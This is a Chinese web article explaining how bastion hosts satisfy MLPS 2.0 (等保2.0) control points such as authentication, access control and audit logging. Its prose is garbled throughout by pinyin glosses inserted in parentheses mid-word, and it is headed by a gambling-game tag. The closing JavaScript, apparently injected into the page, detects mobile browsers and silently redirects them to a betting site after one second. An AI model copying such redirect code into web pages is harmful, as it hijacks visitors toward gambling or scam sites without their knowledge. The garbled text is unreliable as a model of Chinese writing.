mg游戏推荐

一文看懂堡垒机在等保2.0中的控制点及核心功能

2020-06-12 20:16:56 infoadmin 1132


什么是堡垒机


      对运(yun)维人(ren)员的细粒(li)度(du)访问控(kong)制、运(yun)维过程(cheng)的步(bu)步(bu)管(guan)控(kong)、全方位的操作(zuo)审(shen)计,实现运(yun)维过程(cheng)的“事前预防、事中控(kong)制、事后审(shen)计”,契合等保(bao)2.0中安(an)全管(guan)理中心和安(an)全计算环境的相关要求。

图片关键词


堡垒机的功能

1、集中认证:托管主机的账户和(he)密码,运维(wei)人员(yuan)直接(jie)点击<登录>即(ji)可成功(gong)自动登录到目标主机中进行运维(wei)操作,无需输入主机的账户和(he)密码,支持双因素(su)认证。

2、集中账号:支持多种用户角色,每种用户角色的权限都不同,为用设立不同的角色提供了选择,并且满足合规对三权分立的要求。
3、集中权限:通过集中授权,帮助客户梳理用户与主机直接的关系,并且提供一对一、一对多、多对一、多对多的灵活授权模式。
4、集中审计:对所有的操作进行详细记录,并提供综合查询功能;审计日志可以在线播放也可以离线播放,所有的审计日志支持自动备份和自动归档。




堡垒机满足了等保中的哪些要求

01

安全通信(xin)网络层(ceng)面要求与相关功能

控制(zhi)点1:网络架(jia)构

测评项:应(ying)提(ti)供通(tong)信线(xian)路、关键网络设备和(he)关键计算设备的硬件冗余,保证(zheng)系(xi)统的可(ke)用(yong)性(xing)。


控制点2:通信传输

测评项:应采用密码技术保(bao)证通信过程中数据的保(bao)密性。


相关功能

1、支(zhi)持(chi)HA主备模(mo)式,管理口(kou)和(he)心跳口(kou)须支(zhi)持(chi)多(duo)链路端口(kou)绑定功能,防止单网卡或单线(xian)故障。

2、支持多台堡垒机异地备份(fen)部署,每台设(she)备都能(neng)提供运维和审(shen)计服务,配置数(shu)据自动同(tong)步。

3、支(zhi)持集(ji)群部署模式,中心采用(yong)HA,节点(dian)可以横向扩(kuo)展,实现统一登(deng)录入口(kou)、统一配置同步、审计日志集(ji)中存储、会话集(ji)中监控,以满(man)足业(ye)务增长需(xu)求。

4、内置VPN模块(kuai),无需与(yu)其他VPN设备联动,实现运维(wei)入(ru)口安全(quan)接入(ru)。


02

安全计算环境层(ceng)面(mian)要求与(yu)相关功能(neng)

控制点1:身份鉴别

测评项:

1、应(ying)对登(deng)录的用户进行(xing)身份(fen)标识(shi)和(he)鉴别,身份(fen)标识(shi)具有唯一性,身份(fen)鉴别信息具有复杂(za)度要求并(bing)定期(qi)更换;

2、当进行远程管理时,应采(cai)取必要措施防止鉴别信息在网络传输过程中被窃听(ting);


控制点2:访问控制

测评(ping)项:

1、应对登录(lu)的用户分配账户和(he)权(quan)限(xian);

2、应重命名或删除默认(ren)账户,修改(gai)默认(ren)账户的默认(ren)口令;

3、应授予管理用户所需的最小权限(xian)(xian),实现(xian)管理用户的权限(xian)(xian)分离;

4、应由授权主(zhu)(zhu)体配置访问控(kong)制策略(lve),访问控(kong)制策略(lve)规定主(zhu)(zhu)体对客体的访问规则;


控制点3:安(an)全审计

测评项:

1、应启(qi)用安(an)(an)全审计功能,审计覆盖到每个用户,对(dui)重要(yao)的用户行(xing)为和重要(yao)安(an)(an)全事件进(jin)行(xing)审计

2、审(shen)计(ji)记录应包(bao)括事(shi)件的日(ri)期和(he)时(shi)间、用户、事(shi)件类型、事(shi)件是(shi)否成功(gong)及其他与审(shen)计(ji)相关(guan)的信息(xi);

3、应对审计记(ji)录(lu)进行保(bao)护(hu),定期(qi)备份,避免(mian)受(shou)到未预期(qi)的删除、修(xiu)改(gai)或覆(fu)盖等;


相关功能:

1、内(nei)置(zhi)手机APP 认(ren)证(zheng)(谷歌动态(tai)口(kou)令验证(zheng))、OTP 动态(tai)令牌、USBkey 双因素认(ren)证(zheng)引擎。提供短(duan)信认(ren)证(zheng)、AD、LDAP、RADIUS 认(ren)证(zheng)接口(kou)。

2、内置VPN模块,无需与其他VPN设(she)备联动,实现运(yun)维入口安(an)全接入。

3、支持用户多角色划分(fen)功能(neng),如系统管(guan)理(li)员(yuan)(yuan)、部门管(guan)理(li)员(yuan)(yuan)、运维员(yuan)(yuan)、审计管(guan)理(li)员(yuan)(yuan)、密码管(guan)理(li)员(yuan)(yuan)等(deng),对各类角色需要进行细(xi)粒度的权限管(guan)理(li)。

4、支持定期自动修改windows服(fu)务器、网络设备、linux/unix等目标(biao)设备密(mi)码功能。

5、支持(chi)通过基于时间、IP/IP段、用户(hu)(hu)/用户(hu)(hu)组(zu)、设备/设备组(zu)、设备账号、命令关(guan)键字、控制动作、黑白(bai)名(ming)单等组(zu)合访问(wen)控制策略,授权(quan)用户(hu)(hu)可(ke)访问(wen)的目标设备。

6、支(zhi)持对运(yun)维(wei)操(cao)作(zuo)(zuo)会话的起(qi)止时(shi)间(jian)、来源用户、来源IP、目标设备、协议/应用类(lei)型、命令(ling)记录、操(cao)作(zuo)(zuo)内容(如(ru)对文件的上传、下载、删(shan)除、修(xiu)改等操(cao)作(zuo)(zuo)等)的详细行为日志。

7、支持对会(hui)话的(de)录像进行定期归档。

03

安全(quan)管理中心层面要(yao)求与相关功能

控制点(dian)1:系统管理

测评(ping)项:应对(dui)(dui)系统管理(li)员进行身份鉴别,只允(yun)许(xu)其通过特定的命令(ling)或操作界面进行系统管理(li)操作,并对(dui)(dui)这(zhei)些(xie)操作进行审(shen)计;


相关功能:

1、支(zhi)持C/S、B/S、H5等方式进行(xing)代理运维

2、支持管理Linux/Unix 服(fu)(fu)务(wu)器(qi)、Windows 服(fu)(fu)务(wu)器(qi)、网络设备、文件服(fu)(fu)务(wu)器(qi)、Web 系统、数据库服(fu)(fu)务(wu)器(qi)、虚拟(ni)服(fu)(fu)务(wu)器(qi)、远(yuan)程管理服(fu)(fu)务(wu)器(qi)等。

3、兼(jian)容Xshell 、XFTP 、SecureCRT 、MSTSC 、VNC Viewer 、Putty 、WinSCP、FlashFXP、SecureFX、OpenSSH 等多种客户端工具。

4、支持通过基于时(shi)间、IP/IP段、用户/用户组(zu)(zu)、设备(bei)/设备(bei)组(zu)(zu)、设备(bei)账号、命(ming)令(ling)关键字、控(kong)制动作、黑白名单等组(zu)(zu)合访问(wen)(wen)控(kong)制策(ce)略,授权用户可访问(wen)(wen)的目标(biao)设备(bei)。



var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();